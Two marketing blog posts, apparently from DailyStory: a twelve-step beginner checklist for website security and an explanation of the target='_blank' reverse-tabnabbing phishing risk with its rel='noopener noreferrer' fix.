12-step website security checklist for beginners

Website security matters now more than ever.

In fact, there have been about 300 percent more cybercrimes reported to the FBI since the COVID-19 pandemic began.

It’s clearly not just about building trust with your customers. Data breaches can also result in stolen data and lost revenue due to downtime. The global cost of data breaches averaged about $3.86 million in 2020. While the data breaches for large, national companies are what make the news, about 43 percent of cyberattacks do happen to small businesses.

In other words, no small business is too small to be noticed by a hacker.

The following is a 12-step website security checklist that’s simple enough for even the biggest beginners to work through.

No. 1: Keep all your software up to date

Software updates might be annoying or inconvenient, but they’re critical to ensuring that you don’t have obvious vulnerabilities that can be taken advantage of by hackers.

Keep an eye out for software patch notifications. They’re intended to help resolve any discovered vulnerabilities. 

And in general, make sure you update your software as soon as you get those notifications. Resist the urge to “remind me later.”

No. 2: Tighten up your passwords

Passwords are an obvious aspect of your website security that you must consider. However, they’re often neglected as far as:

  • Their complexity
  • How frequently they’re updated

In fact, it’s not uncommon for people to keep all their passwords written on a Post-It located on their computer monitor. We definitely do not recommend this!

Focus on creating complex, secure passwords. As recently as 2019, the password “123456” was used 23 million times in the UK. You can do better than that. Avoid being predictable. Mix up capital letters, numbers and special characters in your passwords.

To help with your password management, you can try tools like LastPass and 1Password. Tools like these can help you not only create secure passwords but can also keep track and help you regularly update them as necessary. We recommend updating every six to 12 months at least.

No. 3: Prevent spam comments on your website

Especially when you’re maintaining blog content on your website, spam comments can be a top concern. In fact, they’re one of the most common ways that hackers and spammers will mess with your website.

Obviously, spam comments reduce the trust your real visitors would have for your site. In addition, spam comments don’t bode well for your search engine optimization (SEO) either.

There are a number of integrations and plugins that can help you identify and moderate comments on your website with a simple code embed. Refer to your hosting platform to see if they already have an option available for you to use.

No. 4: Prepare for the worst by regularly backing up your website (and all of its data)

By backing up your website regularly, you’ll be able to bounce back quickly should something go wrong.

The “wrong” could be a hacker, but it also could just be a garbled website after a problematic redesign. 

Check with your hosting provider for help with this. If you’re using WordPress, there are several plugins that can automate backups.

No. 5: Use an SSL certificate

SSL stands for Sockets Secure Layer, and it helps keep sensitive transfers of data secure.

Think login credentials, credit card information or any other personal information. An SSL certificate gives you that extra layer of protection.

In addition, SSL boosts the overall perceived security of your website since secure websites have a lock symbol on the side of the URL address bar of your browser. In fact, if you don’t have an SSL certificate, the browser will notify visitors either with a “not secure” label or by blocking the connection entirely.

If you don’t already have an SSL certificate for your website, you can get one by:

  • Verifying your website’s information through the ICANN Lookup tool.
  • Generating a Certificate Signing Request (CSR) through your server, your cPanel or an online CSR generator.
  • Submitting your CSR to a certificate authority to validate your domain.
  • Installing the certificate on your website.

No. 6: Limit both user permissions and access

Spoiler alert: You should not give all your employees and colleagues unfettered access to the backend of your website.

Every user with access translates into natural vulnerabilities for your website, so make sure that you’re setting appropriate permissions that reflect each team member’s role.

Of course, you’ll want to terminate access as soon as an employee leaves your team. But you also should set the standard for secure, frequently updated passwords for all users.

No. 7: Only use a trusted payment provider

If you’re processing payments of any kind on your website, it’s important to only use a trusted payment provider. 

Two of the biggest providers are PayPal and Stripe.

Not only will a trusted provider properly and securely process payments, but their use automatically builds trust with your website visitors.

No. 8: Reduce any XSS vulnerabilities on your website

XSS stands for Cross-Site Scripting and refers to the way that hackers can insert malicious code into your website. That code then aims to capture the private data of your website visitors.

This step of reducing those vulnerabilities actually can require a web developer’s help. However, beginners should still be aware of this threat. In the meantime, use a web application firewall to scan your website. You can also clean your user HTML inputs with such tools as HTML Purifier.

No. 9: Reduce any SQL injection vulnerabilities

If your website stores a lot of sensitive user data (like credit card information), you’re doing to want to consider SQL injection vulnerabilities on top of XSS.

It’s not as common but will steal sensitive data directly from your database.

Again, this is definitely a step that you should discuss with your web developer, but solutions can include setting up a firewall, using a whitelist and so on. Learn more about what can be done to reduce SQL injection vulnerabilities.

No. 10: Use anti-malware software for advanced, extra website security

Anti-malware software aims to prevent security threats by detecting and removing them early on from your website (before they do too much damage).

Of course, anti-malware can cost money to install and use. Take the time to review your budget, and remember that the cost of a security breach (both monetarily and perception-wise) can be so much more.

Many website hosting platforms have anti-malware software that you can subscribe to, but if not, you can check out such tools as SiteGuarding or Quttera and see if either is right for you.

No. 11: Keep an eye out for any traffic surges

Another type of website security attack involves blasting your website with fake traffic to essentially overwhelm your web servers and crash your website.

This type of attack, called Distributed Denial of Services (DDoS), happened more than 10 million times in 2020 alone. 

Fortunately, your traffic analytics tools can help you identify and strange surges. Most web hosting platforms come with DDoS protection, but you can always use external tools, such as Cloudflare or Radware, for additional protection.

No. 12: Get an extra layer of protection with Web App Firewalls

Web App Firewalls, otherwise referred to as WAF, defend against multiple types of website security attacks. Hence why this isn’t our first mention of them.

A firewall essentially monitors your web traffic and guards against any traffic that’s malicious. WAFs use policies to determine which traffic is dangerous.

If you’re a small business, we recommend a cloud-based or software-based WAF due to lower cost and ease of maintenance. That being said, there is also hardware-based WAF that, while harder to maintain and more expensive, can also be more effective.

In conclusion

Website security can feel like an overwhelming topic for any website beginner, but simply go step-by-step to identify what you can do better to protect your business and your customers.

Looking to level up your digital marketing process as you secure your website? Consider DailyStory, which features automation, audience segmentation and more. Schedule your free demo with us today.

Building outbound links? You may have a link phishing security issue

If you are building outbound links and using target="_blank" to open clicks in a new browser tab, you may have a link phishing security issue.

security phishing outbound links

As a digital marketing business, we want to help people find great content. That means we create lots of content and link to content. For example, we maintain a list of upcoming marketing conferences and marketing statistics.

Like many websites, for our outbound links, we use target="_blank" in our link anchors. This opens the link in a new tab in the web browser. We do this for a couple of reasons, but the main one is that it keeps the visitor on our website and hopefully they’ll come back when they finish following the link they clicked.

However, when using this technique you can create a phishing vulnerability.

This link phishing vulnerability is not only dangerous, but it is something that a lot of content marketers don’t realize is happening.

How Do I Fix This?

I’ll explain how this link phishing vulnerability works, but if you just want the fix, add this to any links where you use target="_blank":

rel="noopener noreferrer"

For example, let’s say you want to link to DailyStory’s list of upcoming marketing conferences (we would appreciate that). Of course, you want that link to open in a new browser tab. Here is what your link should look like in HTML:

<a href="https://www.dailystory.com/blog/best-marketing-conferences-2017/" target="_blank" rel="noopener noreferrer">List of Marketing Conferences in 2017</a>

When you add rel="noopener noreferrer" to your link it protects you from this link phishing security vulnerability. Something every content marketer should care about!

It’s worth mentioning, that if you are using the latest version of WordPress it will do this for you automatically when you create a link in the rich editor and select ‘Open link in a new tab’:

Prevent Link Phishing

How does this link phishing vulnerability work?

There are lots of great technical explanations of this problem. We’ll summarize and then walk through how the vulnerability could work.

It’s worth noting that the blogs linked to above all reference vulnerabilities in both Facebook and Instagram. Those are fixed.

The simplest explanation is that the newly opened tab, the one opened by your use of target="_blank", gets some special rights and access to the tab that opened it.

The newly opened tab can use JavaScript to access the opening tab and retrieve information from it.

Here is how the vulnerability works:

Someone visits your website and clicks on one of your links to read a blog you referenced, let’s call it “Some Great New Business Idea”. Because your link used target="_blank" a new browser tab was opened. This new tab can access the tab that opened it.

“Some Great New Business Idea” is a page designed to exploit this vulnerability in the hopes that people will link to it ( a bit of a stretch, but work with me).

JavaScript on “Some Great New Business Idea” can communicate with the browser tab that opened it and redirect it to a fake phishing page that looks like a Twitter login screen.

You finish reading “Some Great New Business Idea”, close the tab and see that Twitter wants you to sign back in. Unfortunately, you are now the victim of a phishing attack and have unknowingly given someone your Twitter login.

Bottom line

If you are using outbound links in your content marketing strategy, which most of us are. You need to make sure that you fix this so you don’t expose your readers and visitors to this link phishing vulnerability.